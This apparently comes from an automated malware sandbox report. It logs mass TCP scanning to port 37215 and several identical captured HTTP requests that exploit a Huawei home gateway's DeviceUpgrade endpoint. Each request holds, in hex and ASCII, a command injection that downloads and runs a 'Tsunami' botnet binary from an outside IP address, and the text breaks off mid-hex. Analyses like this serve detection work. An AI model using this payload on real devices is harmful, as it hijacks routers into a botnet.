    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.3.10.117:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.208.167.222:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.92.186.161:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.131.171.152:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.127.173.27:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.204.29.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.198.96.1:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.246.252.223:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.61.79.61:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.146.235.99:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.45.41.208:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.137.6.143:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.192.27.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.104.75.163:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.67.3.201:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.229.119.202:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.142.110.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.101.2.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.242.110.11:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.143.243.38:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.36.196.52:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.184.12.184:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.245.89.44:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.241.68.79:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.198.75.15:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.204.180.214:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.97.36.53:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.15.142.178:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.243.253.255:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.221.118.149:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.246.215.213:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.143.187.100:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.134.50.64:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.15.248.9:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.51.124.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.2.112.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.132.248.225:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.9.231.207:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.143.211.216:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.61.208.166:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.6.101.133:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.158.18.192:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.83.43.2:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.146.181.254:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.138.138.249:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.7.203.35:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.17.51.47:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.72.47.185:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.101.40.240:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.95.166.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.100.144.8:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.202.207.66:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.137.74.137:37215
    Source: global trafficTCP traffic: 192.168.2.23:14065 -> 197.20.178.31:37215
    Source: /usr/sbin/sshd (PID: 5272)Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 5285)Socket: 127.0.0.53::53
    Source: /usr/lib/xorg/Xorg (PID: 5742)Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 5795)Socket: <unknown socket type>:unknown
    Source: /usr/sbin/sshd (PID: 5855)Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 5858)Socket: 127.0.0.53::53
    Source: /usr/lib/xorg/Xorg (PID: 6258)Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 6283)Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd (PID: 6254)Socket: <unknown socket type>:unknown
    Source: /usr/sbin/sshd (PID: 6312)Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 6315)Socket: 127.0.0.53::53
    Source: /usr/lib/xorg/Xorg (PID: 6719)Socket: <unknown socket type>:unknown
    Source: /usr/bin/dbus-daemon (PID: 7540)Socket: <unknown socket type>:unknown
    Source: /lib/systemd/systemd-resolved (PID: 6731)Socket: 127.0.0.53::53
    Source: /usr/sbin/sshd (PID: 6992)Socket: [::]::22
    Source: /lib/systemd/systemd-resolved (PID: 7143)Socket: 127.0.0.53::53
    Source: /usr/sbin/sshd (PID: 7407)Socket: [::]::22
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 33 37 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 54 73 75 6e 61 6d 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 54 73 75 6e 61 6d 69 2e 48 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.37.59 -l /tmp/binary -r /bins/Tsunami.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary Tsunami.Huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 